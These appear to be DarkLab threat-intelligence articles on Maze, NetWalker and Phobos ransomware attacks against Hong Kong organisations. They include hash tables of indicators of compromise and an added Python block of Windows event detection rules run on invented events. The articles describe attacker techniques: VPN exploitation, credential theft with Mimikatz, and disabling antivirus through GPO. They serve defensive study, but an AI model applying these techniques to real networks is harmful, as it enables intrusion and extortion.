58e0c4eef4236380167e9ea679e7885aebb5319dd0ea17365b90b5867cae7ff8

49107c228e38638d3b241bb5c4aa93ef68db20cc0c5a4157e00fc027635418bf

9ea2966982206d42cd8ad215f7a408bf7c1964134e3bef967e7bb93df6dc1f1a

b48f93828a970b7f2122b098cade1e1ab488ef557cf11ae0c44f5690f6c45185

83ba255722d5c337ce128b5e216fc1a4010849b3b4ac3e4841458d371ed757d6

Crypt ‘n’ Leak

New ransomware trend exploits vulnerability in Hong Kong’s VPNs

The fast pace of criminals’ innovation is an ever-recurring theme in cyber security. When the cybercriminal underground economy is particularly saturated, threat actors will likely be driven to explore new ways to differentiate their offering in the illicit cybercriminal market and increase revenue. This is what we are currently observing among ransomware operators. Many ransomware variants have been released in recent years. In the last several months, however, a smaller group of ransomware-as-a-service providers emerged with a new tactic to extort their victims.

DarkLab’s Threat Intelligence team is currently tracking multiple ransomware groups that, in addition to encrypting victims’ data, also steal sensitive files and threaten their public release if ransom demands are not met. The extortionists’ goal is to apply additional pressure on victims by threatening reputational damage and potential regulatory fines if sensitive data is leaked, on top of hindering systems availability.

DarkLab’s incident response team has observed multiple such incidents affecting Hong Kong organisations, highlighting how ransomware leak attacks are a significant and current threat for companies in the region as well as globally. DarkLab has experience in dealing with Maze and NetWalker ransomware attacks in Hong Kong. This article aims to first shed light on each malware’s background, and then to discuss some of the tactics, techniques, and procedures (TTPs) we observed in our incident response investigations.

The RaaS model and its implications

Maze and NetWalker ransomware variants are developed by a core group of cybercriminals and then leased to other criminal operators, called affiliates, on deep and dark web forums. This model is usually referred to as ransomware-as-a-service (RaaS), where operators and developers share profits in an agreed percentage.

RaaS means that different operators of the same ransomware group can target multiple companies at the same time, regardless of their size or geographical location. Ransomware operators are independent actors, so they may differ in the attack tactics exploited. This makes the job of network defenders more challenging because of the larger set of potential tactics, techniques, and procedures (TTPs) to mitigate.

Some RaaS developers, like those of NetWalker, only accept affiliates with proven technical skills and existing access to multiple corporate networks. Stricter cybercriminal candidate screening is leading to an increase in targeted ransomware attacks exploiting external network systems. Exposed remote desktop protocol (RDP) and vulnerable internet-facing services are increasingly more likely entry points than untargeted phishing emails.

The rise of crypt and leak

Since the end of 2019, some ransomware groups have begun threatening to release sensitive victims’ data if their ransom demands are not met. Maze went a step further and set up a dedicated website to publicly shame victims and leak data. More groups, including NetWalker, are now maintaining their own leak websites on the clearnet or on Tor hidden services. DarkLab is currently tracking 13 ransomware leak websites, highlighting the rapidly increasing scale of this crypt and leak trend.

This new pressure tactic by ransomware operators has significant implications for companies. Previously, an efficient back-up policy would potentially guarantee a timely recovery from ransomware attacks. Now that ransomware groups also leak data, back-ups are not enough anymore. Organisations must ensure that sound cyber security hygiene is maintained at all times to prevent a ransomware intrusion from taking place at all.

Maze

Maze ransomware appeared in May 2019, but it began leaking victims’ data only in 2020. The group maintains two sites, one to publish victim data (see figure 1), the other to communicate with its victims and let them decrypt some test files (see figure 2). Both have a back-up Tor hidden service counterpart to avoid takedown by law enforcement.

Figure 1 – redacted screenshot of Maze ransomware leak site

Figure 2 – Screenshot of Maze ransomware chat site

Figure 3 – Geography of Maze’s victims posted on their site

Figure 4 – Sectorial breakdown of Maze’s victims posted on their site

NetWalker

NetWalker ransomware is based on a previous variant called Mailto and was rebranded under its current name in March 2020, despite little change in its code. The developers of NetWalker recruit affiliates on Russian-language cybercriminal forums and particularly look for individuals with network intrusion experience. The group has allegedly been very successful since its inception. NetWalker developers claimed to have gained millions of US dollars since March, although it remains unclear whether this is just an exaggeration to attract more affiliates to their program or not.

NetWalker also operates a website that lists their victims and leaks their data. We noticed that the group behind NetWalker selectively deletes victims’ entries from their website over time, so the range of targeted organisations is likely more extensive than that presented in the graphs below.

Figure 5 – Redacted screenshot of NetWalker ransomware leak site

Figure 6 – Geographical breakdown of NetWalker’s victims posted on their site; more have likely been targeted and either not posted online or deleted from the existing victims’ list

Figure 7 – Sectorial breakdown of NetWalker’s victims posted on their site, more sectors have likely been targeted

Observed tactics, techniques, and procedures

DarkLab incident response investigations found that operators of both Maze and NetWalker exploited a known Pulse Secure VPN vulnerability – CVE-2019-11510 – to gain initial access to victims in Hong Kong. The same vulnerability has been exploited by multiple ransomware groups against other high profile targets, including by Sodinokibi against Travelex in January.

In both cases, the SSL VPN remote access technology was Active Directory (AD) authenticated, giving attackers a legitimate network account early on in their intrusion. Once inside the victim’s network, the attackers would conduct enumeration and other reconnaissance activities by, for instance, searching for password files in shared folders. The attackers would also actively look for idle and vulnerable servers with the intention of expanding their foothold.

During our investigations we found that both intruders used common hacking tools, although with some differences. Tools observed include Windows administration tools like PsExec, open source tools for lateral movement like CrackMapExec, PowerShell versions of Mimikatz and PowerView for credential theft, further enumeration and privilege escalation, as well as off-the-shelf network scanners.

The Maze and NetWalker operators eventually managed to obtain access to administrator accounts, which allowed them in both cases to disable anti-virus solutions on network endpoints. Similarly, creation of new domain administrator accounts gave them persistence on the network.

From such privileged positions the operators staged malware and other required artefacts on accessible locations in the victims’ networks, such as shared folders – for NetWalker – and NETLOGON folders – for Maze. We suspect that in both incidents scripts were used to automatically spread the ransomware in the network.

In the case of Maze, the deployment script would also disable endpoint protection software and enable services, such as Windows Remote Management, that would allow re-entry. Maze operators also abused group policy objects (GPOs) to weaken endpoint defences by changing configurations, and to redeploy the malware to new machines. The latter would ensure that the ransomware would also spread to endpoints after they shut down or if they joined the network at a later time.

Conclusion

The double extortion of crypt and leak groups and the growing trend of targeted attacks against external network infrastructure make ransomware leaks one of the most significant threats to companies, regardless of sector. The recent targeting of Hong Kong organisations by Maze and NetWalker also reaffirms how the SAR’s threat landscape is closely associated with threat trends worldwide.

Companies in Hong Kong should therefore adopt a proactive approach to review their security posture and avoid targeted network intrusions in the first place. Presence of timely back-ups can help restore system availability, but it is not an effective mitigation against the increasing threat of ransomware data leaks. Organisations should also focus on maintaining situational awareness on developments in the global threat landscape, as threats to companies abroad are likely to quickly become threats to Hong Kong organisations too.

Indicators of Compromise

Hash                               File name          Description
c45ebccb7dc2bbc34c51c82c3eba6448   apply.ps1          Generates GPO package to disable AV, settings
16b5ddd25bb610270e52c1663931ef4c   system.dll         Maze ransomware
0e7d5d16e03393605f5f4862f1b9cc37   crackmapexec.exe   Lateral movement tool
d6a246a98a0387e2a5f9d95ddd8ae164   syspool.exe        Lightweight network scanner
696bb8648eceaa187cbc1f06205a23ce   city.exe           NetWalker ransomware
84ddf23d4307b1a9989352f4845d0ede   city.ps1           NetWalker PowerShell script

Phobos ransomware

Incidents affecting Hong Kong organisations

In the last two months, DarkLab’s Incident Response and Threat Intelligence teams observed multiple incidents in Hong Kong involving the Phobos ransomware variant.

There are no explicit indications that these incidents are part of a campaign targeting Hong Kong. Rather, they are likely due to Phobos’ prevalence in the cybercriminal underground. Nonetheless, the similarities in observed tactics, techniques and procedures (TTPs), and in the ransomware deployed, prompted us to release this alert to help companies improve their timely detection of and response to this threat.

Intrusions analysis

Phobos shares many similarities with the Dharma ransomware, and has been sold as ransomware-as-a-service on the cybercriminal underground since at least December 2018. This means that even low-skilled threat actors can rent the malware from its developers and spread it via whatever means they have access to.

According to DarkLab’s incident investigations, exploitation of remote desktop protocol (RDP) servers and their credentials is the most common infection vector. In particular, we observed RDP brute-forcing and exploitation of weak password policies as the most frequent attack vectors. Such TTPs match previously reported instances of Phobos intrusions worldwide.

Once inside the victims’ network, we have seen criminals creating a local account with netplwiz, deploying a malicious network share scanner called 5-NS new.exe, and deleting event logs prior to executing the main payload.

Several hours after the initial intrusion, threat actors triggered the ransomware in the form of a malicious executable. Other than encrypting the files, the ransomware also tampered with infected hosts to disable the firewall and other security configurations.
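
The TTPs in this Phobos write-up and in the Maze/NetWalker article above (RDP brute-forcing followed by a successful logon, a new account created with netplwiz, event log deletion, PsExec service installation, new domain administrators, GPO tampering) each leave a Windows event that a SIEM rule can key on. The following is an added detection example, not tooling from the article: it runs six rules over a constructed event stream whose field names follow the Windows Security and System event schemas (EventID 4625/4624 with IpAddress and LogonType, 4720, 4728, 7045, 5136, 1102) but whose values, hosts and timings are invented. The brute-force window and threshold are assumptions to tune per environment.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

BRUTE_FORCE_WINDOW = timedelta(minutes=10)   # assumption: tune to the environment
BRUTE_FORCE_THRESHOLD = 5                    # failed logons from one source before a success
PRIVILEGED_GROUPS = {"domain admins", "administrators", "enterprise admins"}

# Constructed events (not real telemetry). Only the fields the rules need are included.
SAMPLE_EVENTS = [
    *[{"time": f"2020-05-04T02:0{i}:00", "EventID": 4625, "IpAddress": "203.0.113.5",
       "TargetUserName": "administrator"} for i in range(5)],
    {"time": "2020-05-04T02:06:00", "EventID": 4624, "IpAddress": "203.0.113.5",
     "LogonType": 10, "TargetUserName": "administrator"},
    {"time": "2020-05-04T02:20:00", "EventID": 4720, "SubjectUserName": "administrator",
     "TargetUserName": "svc_bkp"},
    {"time": "2020-05-04T02:25:00", "EventID": 4728, "TargetUserName": "Domain Admins",
     "MemberName": "CN=svc_bkp,CN=Users,DC=example,DC=local", "SubjectUserName": "administrator"},
    {"time": "2020-05-04T02:30:00", "EventID": 7045, "ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"time": "2020-05-04T02:40:00", "EventID": 5136, "ObjectClass": "groupPolicyContainer",
     "SubjectUserName": "svc_bkp"},
    {"time": "2020-05-04T03:10:00", "EventID": 1102, "SubjectUserName": "svc_bkp"},
    # Benign RDP logon with no preceding failures: must not alert.
    {"time": "2020-05-04T09:00:00", "EventID": 4624, "IpAddress": "10.20.0.15",
     "LogonType": 10, "TargetUserName": "jchan"},
]


def detect(events) -> list:
    """Run the rules over time-ordered events; returns (rule, actor, target) tuples."""
    alerts = []
    failures = defaultdict(deque)    # source IP -> timestamps of recent 4625 failures
    for ev in sorted(events, key=lambda e: e["time"]):
        now = datetime.fromisoformat(ev["time"])
        eid = ev["EventID"]
        source = ev.get("IpAddress")

        if eid == 4625:                                   # failed logon
            window = failures[source]
            window.append(now)
            while window and now - window[0] > BRUTE_FORCE_WINDOW:
                window.popleft()

        elif eid == 4624 and ev.get("LogonType") == 10:   # RemoteInteractive (RDP) success
            recent = [t for t in failures.get(source, ()) if now - t <= BRUTE_FORCE_WINDOW]
            if len(recent) >= BRUTE_FORCE_THRESHOLD:
                alerts.append(("rdp_bruteforce_then_success", source, ev.get("TargetUserName")))

        elif eid == 4720:                                 # user account created (e.g. via netplwiz)
            alerts.append(("account_created", ev.get("SubjectUserName"), ev.get("TargetUserName")))

        elif eid in (4728, 4732) and ev.get("TargetUserName", "").lower() in PRIVILEGED_GROUPS:
            alerts.append(("privileged_group_member_added", ev.get("MemberName"), ev.get("TargetUserName")))

        elif eid == 7045:                                 # new service installed (System log)
            blob = (ev.get("ServiceName", "") + " " + ev.get("ImagePath", "")).lower()
            if "psexesvc" in blob:
                alerts.append(("psexec_service_installed", ev.get("ServiceName"), ev.get("ImagePath")))

        elif eid == 5136 and ev.get("ObjectClass") == "groupPolicyContainer":
            alerts.append(("gpo_modified", ev.get("SubjectUserName"), "groupPolicyContainer"))

        elif eid == 1102:                                 # audit log cleared
            alerts.append(("security_log_cleared", ev.get("SubjectUserName"), "Security"))

    return alerts


if __name__ == "__main__":
    for rule, actor, target in detect(SAMPLE_EVENTS):
        print(f"{rule:32} actor={actor!r} target={target!r}")
```

Note that 1102 and 4720 fire on routine administration too; the value of the sequence above is its ordering, a brute-forced RDP logon within minutes of a new account, a privileged-group change and a service install, which is why the rules emit the actor and target so that a correlation layer can chain them on host and account.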

Conclusion

Attackers did not employ particularly sophisticated tradecraft and PwC was able to help clients contain the incidents quickly. Nonetheless, the intrusions impaired systems availability and created operational disruption among victim companies. This can be particularly damaging when most organisations’ staff connect remotely to the corporate network due to the COVID-19 pandemic.

Recommendations

To protect against ransomware incidents via RDP exploitation, DarkLab recommends that companies:

  • Ensure visibility over public-facing RDP servers via external scans
  • Limit exposure of public-facing systems whenever possible
  • Enforce use of multi-factor authentication for remote access, particularly RDP
  • Ensure your organisation has and follows an effective back-up policy

File name               MD5                                Description
20.09.2019Taskmgr.exe   b8351ba02dbce02292a01a6e85112e2b   Phobos ransomware
Mouse Lock_v22.exe      fc9c80e1767e1266056b1b2c89a74ce5   Blocks mouse cursor on screen
5-NS new.exe            597de376b1f80c06d501415dd973dcec   Network shares scanner

Cyber threats to Hong Kong

An incident response perspective

In the last two years, DarkLab has helped clients respond to, and recover from, numerous network intrusions. Our clients span a variety of sectors in Hong Kong and Macau, including financial services, real estate, telecommunications, and aviation, among others. The organisations we helped also varied greatly in size and cyber security maturity. Some employed just a handful of personnel with no dedicated security function, while others were large international organisations with an established CISO and security teams.

This range of incident response experience means that DarkLab is in a unique position to identify cyber threats to Hong Kong companies across multiple sectors. In this article, we share some of the threat trends we have observed first hand, and highlight effective mitigation methods companies can implement to thwart them.

Common attacks against companies in Hong Kong

In 2018, we were called in to help investigate a significant number of business email compromise (BEC) frauds against financial services companies. BEC frauds see threat actors sending emails to employees, often in the finance department, to instruct them to direct funds to a bank account that scammers control. For the fraud to work, the email needs to appear to originate from an internal, trusted email account.

While email spoofing is the simplest option for threat actors, in most of the incidents we observed threat actors instead directly compromised an email account. This allowed them to monitor their victim’s incoming emails and hijack an email thread to grant their fraudulent request greater credibility. While BEC scammers usually spent no more than a couple of days in their victim’s accounts, we saw one incident where their presence remained undetected for almost a week.

In 2019, the most common type of attacks were ransomware and cryptomining. Cryptomining incidents were mostly caused by automated botnets. Intrusions were often detected promptly by victims due to the unusually high CPU usage required to generate cryptocurrency.

Ransomware attacks instead showed a higher degree of stealth and manual lateral movement. For instance, in one ransomware intrusion the attackers operated in the infected network only outside standard office hours. By also exploiting living-off-the-land techniques, the intruders managed to remain unnoticed until the encryption routine was activated some 20 days later.

Threat intelligence suggests that last year ransomware and cryptomining threats were on the rise globally, showing how threats to Hong Kong closely follow global threat trends.

Main initial attack vectors exploited

The initial attack vector for most incidents we investigated was abuse of internet-facing infrastructure, often using brute-force attacks or stolen credentials to access servers with remote desktop protocol (RDP) or secure shell (SSH) enabled.

For instance, a client in the shipping industry had ten servers infected by the Anacron cryptomining malware. Upon investigation, we discovered attempted bruteforce attacks against the same SSH server for almost a month, suggesting automated botnet activity. Once logged in, the malware spread to 10 additional servers that shared the same password as the infected web server.

Ransomware infections that initiated on a public-facing RDP server were also relatively common. For instance, we responded to one such incident involving the Dharma/Crysis ransomware that was affecting a real estate development company.

In at least one case, however, a publicly available exploit enabled a ransomware attack against a company in the professional services sector. Attackers exploited a known vulnerability in Windows IIS (CVE-2017-7269) to gain initial access to a server used for testing, which was left exposed to the internet. After stealing multiple IT user accounts with the highest privileges, the attacker compromised and encrypted 62 Windows servers causing significant business disruption.

Espionage intrusions against organisations in Hong Kong

Although less numerous, we also witnessed prolonged and organised network intrusions against companies in Hong Kong carried out by skilled threat actors.

In an incident in late 2019, we responded to a supply-chain compromise carried out by a likely espionage group against a Hong Kong client in the aviation sector. The attacker targeted a subsidiary of the client by exploiting an unpatched firewall vulnerability to obtain valid VPN credentials. Once inside the victim’s network, the threat actor conducted extensive reconnaissance and staged various tools on internal servers. Tools included the credential-dumping tool Mimikatz, NBTScan for network scanning, and PsExec for lateral movement.

After more than a month in the subsidiary’s network, the threat actor exploited the trusted connection with the main organisation’s network to move across. Fortunately, the intrusion in the main organisation’s network was detected in time and it did not result in exfiltration of data. Nonetheless, we saw similar tactics, techniques and procedures used against another Hong Kong critical national infrastructure company in 2018. This suggests that espionage threat actors continue to pose a threat to Hong Kong organisations in strategic sectors.

Mitigations

Despite the range of potential threats to companies in Hong Kong, cyber security best practices and common hygiene methods can help deter a significant portion of the cyber attacks we observed.

To improve your organisation’s resilience to cyber attacks, we suggest the following:

  • Enforce the use of multi-factor authentication for remote access
  • Restrict domain admin rights
  • Limit exposure of public-facing systems
  • Ensure that best practices for network segmentation are observed
  • Conduct regular security awareness training for IT and non-IT staff
  • Perform regular cyber attack simulations to ensure resiliency
  • Consider establishing or outsourcing a Security Operations Centre (SOC) for security log monitoring and threat hunting
  • Ingest timely Cyber Threat Intelligence feeds and reporting for proactive defence against upcoming threats